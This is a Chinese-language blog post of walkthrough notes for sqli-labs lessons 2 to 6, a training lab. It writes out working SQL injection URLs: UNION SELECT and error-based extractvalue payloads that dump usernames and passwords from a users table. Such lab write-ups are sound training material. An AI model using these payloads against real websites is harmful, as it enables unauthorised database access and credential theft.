sqli-labs-lesson2-6

lesson2

第一课是字符注入,就是php给他加了引号变成了字符
这一个是数值型注入,不需要添加引号, 其他的都一样
http://192.168.154.131/sqli/Less-2/?id=1--
http://192.168.154.131/sqli/Less-2/?id=1 union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson2.png

lesson3

使用')闭合
http://192.168.154.131/sqli/Less-3/?id=1') union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson3.png

lesson4

使用") 闭合
http://192.168.154.131/sqli/Less-4/?id=1") union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson4.png

lesson5

这里没有回显,只能使用报错注入
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

lesson5.png

但这里显示有限,得多几次显示
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users where username not in ('Dumb', 'Angelina')))) --

lesson6

双引号报错注入
http://192.168.154.131/sqli/Less-6/?id=1" and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

lesson6.png

部分笔记

图片.png

完整笔记等通关就放出来

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • http://127.0.0.1/sqli-labs-master 浅析MySQL中concat以及group_c...
    BerL1n阅读 8,660评论 0 4
  • 搭建环境 phpstudy配置密码 最好在页面加上 探测注入点 http://192.168.154.131/sq...
    疯帮主阅读 372评论 0 0
  • 整理一下手工注入笔记,以sqli-labs环境为例。 1.Mysql手工union联合查询注入 输入单引号,页面报...
    牙疼吃糖阅读 2,719评论 0 0
  • 在做题之前可以先参考MYSQL注入天书之stacked injection LESS-38 本关用常用方法都可以爆...
    BerL1n阅读 1,362评论 0 1
  • /深山老林(千年桃妖) 过桥 搭船 钻隧道 翻山 越岭 已经折了全部兵 遭过数不清的罪 流干体内的泪 途经一个一个...
    深山老林千年桃妖阅读 260评论 2 1